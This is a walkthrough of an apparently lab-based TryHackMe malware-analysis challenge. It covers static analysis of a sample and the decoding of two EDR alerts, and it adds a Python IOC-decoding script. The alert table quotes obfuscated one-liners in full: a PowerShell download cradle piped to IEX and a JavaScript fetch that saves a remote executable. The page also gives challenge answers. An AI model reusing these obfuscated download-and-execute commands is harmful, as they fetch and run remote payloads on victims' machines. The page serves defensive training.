Shadow Trace – TryHackMe Defensive Security Challenge
This is a walkthrough for the Shadow Trace Windows Malware Analysis TryHackMe challenge room. The writeup is meant to offer short and concise solutions, followed where needed by an extended explanation for those interested in finding out more about the solution to a specific task.
Introduction
The description of the room is the following:
Analyse a suspicious file, uncover hidden clues, and trace the source of the infection.
A quite short room, Shadow Trace has two sections: File Analysis and Alert Analysis. It focuses on static malware analysis, where we analyse a file to identify its behaviour and data and gather potential Indicators of Compromise, and on alerts related to a potential Living Off the Land attack, where we rely on our knowledge of the normal behaviour of trusted tools.
Do note that all URLs have been defanged.
Task 1: File Analysis
The machine in question contains several DFIR tools. For this task I decided to use PE Bear (a PE file header analyzer) and CAPA (which needs to be added to the Windows environment variables before it can be run from the command line). The file in question is called windows-update.exe.
What is the architecture of the binary file windows-update.exe?
On PE Bear, we head to the “File Hdr” tab –> Machine –> Meaning. We see AMD64. The answer is:
64-bit
Alternatively, using CAPA: the “arch” value says AMD64 as well.
What is the hash (sha-256) of the file windows-update.exe?
It can be easily found both in PE Bear and CAPA:
b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc
Identify the URL within the file to use it as an IOC
For this, we need to check the strings within the file. PE Bear has a Strings tab for this as well. Scrolling down the Strings tab, we will eventually find the URL the file was downloaded from:
hxxp[://]tryhatme[.]com/update/security-update[.]exe
With the URL identified, can you spot a domain that can be used as an IOC?
Around string 121, we see that it tries to connect to an SMTP server and eventually to a specific domain, right before trying to open the \etc\hosts file. Since the hosts file maps IP addresses to hostnames, the domain we are looking for must be nearby. The domain the file tries to connect to is:
responses.tryhatme.com
Input the decoded flag from the suspicious domain
In previous strings (specifically, string 110), we see an attempt to download from a domain with a path that appears to be encoded using base-64:
tryhatme.com/VEhNe3lvdV9nMHRfc29tZV9JT0NzX2ZyaWVuZH0=
Decoding the path from Base-64 will result in the flag.
What library related to socket communication is loaded by the binary?
This question is about a loaded library, which means we look in the imports section of the PE header. The malware imports several libraries, so it takes some investigation. After researching online, the only one among the imported libraries that handles sockets is:
WS2_32.dll
Task 2: Alert Analysis
This task is not directly related to the previous one. We are provided a view of an EDR agent with two alerts. We must use our knowledge of what is expected system behavior to answer these. The alerts are the following:
| Time | Command | Severity | Rule | Host | Process |
|---|---|---|---|---|---|
| Mar 7th 2026 at 14:10 | `(new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl"))) \| IEX;` | Critical | Suspicious PowerShell execution | WIN-SRV-01.tryhackme.local / CORPsvc_backup | powershell.exe |
| Mar 7th 2026 at 15:10 | `fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=>String.fromCharCode(c)).join('')).then(r=>r.blob()).then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;a.download='test.txt';document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);});` | Critical | Suspicious Browser Download | WIN-SRV-01.tryhackme.local / CORPsvc_backup | chrome.exe (browser JavaScript execution) |
Can you identify the malicious URL from the trigger by the process powershell.exe?
At the beginning of the PowerShell command, we see an object called “system.net.webclient” followed by DownloadString. As the name implies, it creates a web client and downloads the content at the path given as the DownloadString parameter. Near the end of the command, we see the words “Convert” and “FromBase64String”. The string inside those parentheses is the URL, Base-64 encoded.
Once decoded, we get the answer:
hxxps[://]tryhatme[.]com/dev/main[.]exe
Can you identify the malicious URL from the alert triggered by chrome.exe?
For the second alert, we see the JavaScript fetch function, and later in the command we see that it turns the object obtained by fetch into a URL and downloads from it.
Because the array passed to fetch is definitely not a URL, we can assume it is encoded. Each number is a decimal character code (String.fromCharCode turns it back into a character). Once decoded, we get our answer.
hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe
Note: if you do not know the encoding algorithm used, some tools like CyberChef provide a “detect encoding algorithm” functionality as well as the expected encoding/decoding ones. For CyberChef, this is called the “Magic” algorithm, which provides several guesses at what the encoding algorithm might be.
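The two decoding steps above (Base-64 inside FromBase64String, and a decimal character-code array fed to fromCharCode) can be automated so that every alert of this shape yields a defanged IOC. This is an added example, not part of the original write-up; the regexes and the defang helper are my own assumptions about the alert text, and the two sample commands are the page's alerts embedded inline.

```python
import base64
import re

# Constructed sample: the two EDR alert commands from the write-up, embedded
# here so the script runs offline with no access to the lab.
ALERT_COMMANDS = {
    "powershell.exe": '(new-object system.net.webclient).DownloadString('
                      '[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
                      '"aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl"))) | IEX;',
    "chrome.exe": "fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,"
                  "117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,"
                  "99,111,109,47,117,112,100,97,116,101,46,101,120,101]"
                  ".map(c=>String.fromCharCode(c)).join('')).then(r=>r.blob())",
}

# Assumed patterns for the two obfuscation styles seen in the alerts.
B64_RE = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
CHARCODE_RE = re.compile(r'\[((?:\d{1,3}\s*,\s*)*\d{1,3})\]\s*\.map\([^)]*fromCharCode')


def decode_command(cmd: str) -> list[str]:
    """Return every URL recovered from the obfuscated layers of one command."""
    found = []
    for b64 in B64_RE.findall(cmd):
        # Base-64 layer: decode bytes, then interpret as UTF-8 like the PowerShell does.
        found.append(base64.b64decode(b64).decode("utf-8", errors="replace"))
    for nums in CHARCODE_RE.findall(cmd):
        # Decimal char-code layer: each number is one character's code point.
        found.append("".join(chr(int(n)) for n in nums.split(",")))
    # Keep only strings that actually look like URLs.
    return [s for s in found if re.match(r"https?://", s)]


def defang(url: str) -> str:
    """Defang a URL the way the write-up does (hxxp, [://], [.])."""
    return url.replace("http", "hxxp", 1).replace("://", "[://]").replace(".", "[.]")


def extract_iocs(alerts: dict[str, str]) -> dict[str, list[str]]:
    """Map each alerting process to the defanged URLs hidden in its command."""
    return {proc: [defang(u) for u in decode_command(cmd)] for proc, cmd in alerts.items()}


if __name__ == "__main__":
    for proc, urls in extract_iocs(ALERT_COMMANDS).items():
        print(proc, "->", ", ".join(urls) or "(no URL recovered)")
```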
What's the name of the file saved in the alert triggered by chrome.exe?
The command contains the section a.download='test.txt'. This attribute tells the browser what name to save the file under. Hence, the answer is:
test.txt
Congratulations! The room is finished.
Conclusion
While a particularly short room, it was definitely an educational one. I had never done malware analysis like this before, despite static analysis being an important part of the responsibilities of a Blue Team member. I had the chance to finally use tools like PE Header analyzers or CAPA on actually malicious files, and put my knowledge on expected system behavior (in this case, PowerShell) to the test!